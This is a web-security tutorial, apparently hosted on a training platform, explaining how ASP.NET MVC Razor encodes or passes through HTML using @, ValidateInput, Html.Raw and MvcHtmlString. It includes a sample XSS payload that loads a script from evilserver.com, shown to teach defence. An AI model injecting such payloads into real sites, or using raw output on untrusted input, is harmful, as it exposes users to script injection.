First time at GK Digital?

GK Digital is an online, collaborative learning platform built from the ground up to be a superior learning experience on the web. It is self-paced and supported by instructors and peers. GK Digital is professional training in the 21st century, from Global Knowledge.
Activity: Understanding Text Encoding in ASP.NET MVC

This article by Michael Kennedy explores how Razor treats text data which (may) contain HTML or script - sometimes malicious, sometimes begnin.

In some situations, we want to make the HTML part of our page. An example of this might be a CMS editor backend. This requires one type of syntax.

In other situations, we want to ensure that we do not allow the HTML into our page but rather we HTML encode it to make it safe. An example here might be the comments section of a blog app. This requires a different type of Razor syntax.

There are other scenarios as well. Michael's article demonstrates the various options you have in MVC and Razor for dealing with this.

Note: The code for this article is available on GitHub if you want to look behind the scenes.

================================================================

This article covers the various ways in which you might handle text encoding in ASP.NET MVC. For example, if you were writing a forum web app, you should absolutely be paranoid about what your users are typing into your site. You need to be very careful about how you redisplay their input. For example, a friendly forum user might write something like:

Nice post, thanks for sharing!

On the other hand, they may write:

<script src=”http://evilserver.com/xss.js”></script&gt;
<script>xss.doBadDeeds();</script>

If you turn around and show this “post” to your other uses, maybe they’ll get hacked. At a minimum, the evil-doers could be a nuisance to your real users.

On the other hand, if you're building a CMS or utility helper method, you do not want to filter out the HTML a user might type. They probably need to enter some HTML which you'll want to show to all the other users. Same thing goes for code your app might generate.

There are at least three ways which MVC manages and encodes (or does not encode) text data. Knowing which scenario you’re targeting allows you to choose the right option. We’ll look at four examples in this post:

  1. A forum app which can be hacked
  2. A forum app which is safe from XSS injection
  3. A CMS app with rich text editing
  4. Generating HTML in code for use in MVC Razor views

Protecting Against Unwanted HTML Inputs

First, the good news. MVC protects you in several ways against any sort of HTML / JS injection issues. When you write out string contents such as below, it HTML encodes it by default when using @.

If we assume commentText = “<script src=’evil.js’></script>”, then the output would simply be:

Comment text: <script src=’evil.js’></script>

That is &lt;script src=’evil.js’&gt;&lt;/script&gt; in view source, which is perfectly safe.

Next, it is unlikely that this input ever makes it to your site. By default, if you have an action method taking this input, it will just error out with the following message:

Error on submit:

A potentially dangerous Request.Form value was detected from the client…

Of course, we could disable this with a ValidateInput attribute:

In this case, you must be VERY careful when you write out the commentText values later.

So far we have seen that by default razor outputs text in a safe way using @value. Also, POST requests are blocked if they have dangerous content unless you let it in.

In order to demonstrate these concepts, I created a working sample app here:

http://text-encoding-aspnet-mvc-by-example.azurewebsites.net/

View the safe forum and unsafe forum sections to see what happens. You can download the code from the sample as well.

Allowing Direct HTML Inputs

But what if you trust the input and need MVC out of the way so you can write true HTML content to the browser? One such example might be a CMS you’re writing. There are two cases you would treat differently here. Is your HTML coming from data given to your view or from code called by your view?

Let’s assume it’s handed to you as a string in a variable called cmsSectionData (i.e. data). Then we can use the helper method:

@Html.Raw(cmsSectionData)

rather than @cmsSectionData. This will make the contents of cmsSectionData part of your HTML in the view. You will also need to disable validation on any edit pages using [ValidateInput(false)] as shown above.

Check out the CMS section of the demo to see it in action.

Finally, if you are writing little helper methods to make your views cleaner (a good idea!), you’ll do something totally different. For example, suppose we frequently need to wrap images in links in our views. We could write it out in HTML each time, or we could write a method on a class we make called OurHtmlHelper called LinkWithImage. Here is an example implementation:

You might think we could write code like this:

But MVC’s encoding for @ would block it for sure. You could wrap it in an @Html.Raw() but there is a better way.

Introducing the MvcHtmlString class

The purpose of this class is to inform MVC to get out of the way and NOT encode the contents. So simply changing the return type of LinkWithImage to MvcHtmlString fixes it.

Check out the Helpers section of the demo to see this in action.

There you have it. Three ways to encode or avoid encoding HTML data in ASP.NET MVC applications.

Preview any course on GK Digital for free.

Just choose a course from our catalog and then press preview course for free.